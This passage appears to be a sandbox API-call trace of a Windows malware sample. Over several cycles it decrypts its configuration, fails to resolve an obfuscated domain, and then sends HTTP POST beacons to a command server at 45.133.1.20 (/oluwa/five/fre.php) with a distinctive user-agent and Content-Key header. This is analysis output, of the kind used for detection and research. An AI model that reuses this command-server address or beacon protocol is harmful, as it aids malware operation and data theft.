(in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0313.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.211] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0313.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.212] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0313.212] GetProcessHeap () returned 0x6a0000 [0313.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.214] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.216] GetProcessHeap () returned 0x6a0000 [0313.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0313.217] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.217] GetProcessHeap () returned 0x6a0000 [0313.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0313.218] GetProcessHeap () returned 0x6a0000 [0313.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.218] GetProcessHeap () returned 0x6a0000 [0313.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0313.219] GetProcessHeap () returned 0x6a0000 [0313.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0313.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.220] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0313.241] GetProcessHeap () returned 0x6a0000 [0313.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0313.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.242] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0313.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.246] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.251] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.252] GetProcessHeap () returned 0x6a0000 [0313.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0313.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.254] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0313.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.255] CryptDestroyKey (hKey=0x6ad020) returned 1 [0313.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.256] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0313.256] GetProcessHeap () returned 0x6a0000 [0313.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0313.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0313.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.260] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0313.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0313.262] GetProcessHeap () returned 0x6a0000 [0313.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0313.262] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0313.262] GetProcessHeap () returned 0x6a0000 [0313.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0313.262] socket (af=2, type=1, protocol=6) returned 0xbf8 [0313.263] connect (s=0xbf8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0313.295] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0313.295] GetProcessHeap () returned 0x6a0000 [0313.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0313.295] GetProcessHeap () returned 0x6a0000 [0313.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0313.296] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.297] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.297] GetProcessHeap () returned 0x6a0000 [0313.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df0e8 [0313.297] GetProcessHeap () returned 0x6a0000 [0313.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.298] GetProcessHeap () returned 0x6a0000 [0313.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0313.298] GetProcessHeap () returned 0x6a0000 [0313.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0313.299] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.300] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.300] GetProcessHeap () returned 0x6a0000 [0313.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0313.300] GetProcessHeap () returned 0x6a0000 [0313.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.301] send (s=0xbf8, buf=0x6bd460*, len=242, flags=0) returned 242 [0313.302] send (s=0xbf8, buf=0x6bb998*, len=159, flags=0) returned 159 [0313.302] GetProcessHeap () returned 0x6a0000 [0313.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0313.302] recv (in: s=0xbf8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0313.378] GetProcessHeap () returned 0x6a0000 [0313.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0313.381] GetProcessHeap () returned 0x6a0000 [0313.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0313.381] GetProcessHeap () returned 0x6a0000 [0313.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df0e8 | out: hHeap=0x6a0000) returned 1 [0313.382] GetProcessHeap () returned 0x6a0000 [0313.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0313.383] closesocket (s=0xbf8) returned 0 [0313.383] GetProcessHeap () returned 0x6a0000 [0313.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0313.383] GetProcessHeap () returned 0x6a0000 [0313.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.384] GetProcessHeap () returned 0x6a0000 [0313.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0313.384] GetProcessHeap () returned 0x6a0000 [0313.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0313.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1938) returned 0xbf8 [0313.388] Sleep (dwMilliseconds=0xea60) [0313.393] GetProcessHeap () returned 0x6a0000 [0313.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0313.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.405] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0313.417] GetProcessHeap () returned 0x6a0000 [0313.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6a28 [0313.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.419] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b6a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0313.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.420] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.425] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.425] GetProcessHeap () returned 0x6a0000 [0313.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a28 | out: hHeap=0x6a0000) returned 1 [0313.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.448] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0313.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.452] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0313.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.454] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0313.454] GetProcessHeap () returned 0x6a0000 [0313.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.459] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.461] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.463] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.463] GetProcessHeap () returned 0x6a0000 [0313.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0313.464] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.464] GetProcessHeap () returned 0x6a0000 [0313.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0313.465] GetProcessHeap () returned 0x6a0000 [0313.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.471] GetProcessHeap () returned 0x6a0000 [0313.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0313.471] GetProcessHeap () returned 0x6a0000 [0313.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0313.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.485] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0313.496] GetProcessHeap () returned 0x6a0000 [0313.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0313.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.497] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0313.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.498] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.504] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.504] GetProcessHeap () returned 0x6a0000 [0313.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0313.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.506] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0313.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.507] CryptDestroyKey (hKey=0x6ad020) returned 1 [0313.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.509] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0313.509] GetProcessHeap () returned 0x6a0000 [0313.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.510] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0313.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.515] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0313.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.516] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0313.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.517] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0313.517] GetProcessHeap () returned 0x6a0000 [0313.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0313.517] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0313.517] GetProcessHeap () returned 0x6a0000 [0313.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0313.517] socket (af=2, type=1, protocol=6) returned 0xbfc [0313.518] connect (s=0xbfc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0313.541] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0313.541] GetProcessHeap () returned 0x6a0000 [0313.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0313.541] GetProcessHeap () returned 0x6a0000 [0313.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0313.542] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.543] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.543] GetProcessHeap () returned 0x6a0000 [0313.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6def68 [0313.543] GetProcessHeap () returned 0x6a0000 [0313.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.544] GetProcessHeap () returned 0x6a0000 [0313.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0313.544] GetProcessHeap () returned 0x6a0000 [0313.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0313.548] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.549] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.549] GetProcessHeap () returned 0x6a0000 [0313.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0313.549] GetProcessHeap () returned 0x6a0000 [0313.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.550] send (s=0xbfc, buf=0x6bd460*, len=242, flags=0) returned 242 [0313.551] send (s=0xbfc, buf=0x6bb998*, len=159, flags=0) returned 159 [0313.551] GetProcessHeap () returned 0x6a0000 [0313.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0313.552] recv (in: s=0xbfc, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0313.627] GetProcessHeap () returned 0x6a0000 [0313.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0313.628] GetProcessHeap () returned 0x6a0000 [0313.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0313.628] GetProcessHeap () returned 0x6a0000 [0313.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def68 | out: hHeap=0x6a0000) returned 1 [0313.629] GetProcessHeap () returned 0x6a0000 [0313.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0313.629] closesocket (s=0xbfc) returned 0 [0313.630] GetProcessHeap () returned 0x6a0000 [0313.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0313.630] GetProcessHeap () returned 0x6a0000 [0313.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.631] GetProcessHeap () returned 0x6a0000 [0313.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0313.631] GetProcessHeap () returned 0x6a0000 [0313.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0313.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x193c) returned 0xbfc [0313.634] Sleep (dwMilliseconds=0xea60) [0313.635] GetProcessHeap () returned 0x6a0000 [0313.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0313.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0313.852] GetProcessHeap () returned 0x6a0000 [0313.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0313.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.853] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0313.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.854] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.855] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.855] GetProcessHeap () returned 0x6a0000 [0313.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0313.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.857] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0313.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.861] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0313.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.862] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0313.862] GetProcessHeap () returned 0x6a0000 [0313.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.863] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.864] LoadLibraryW 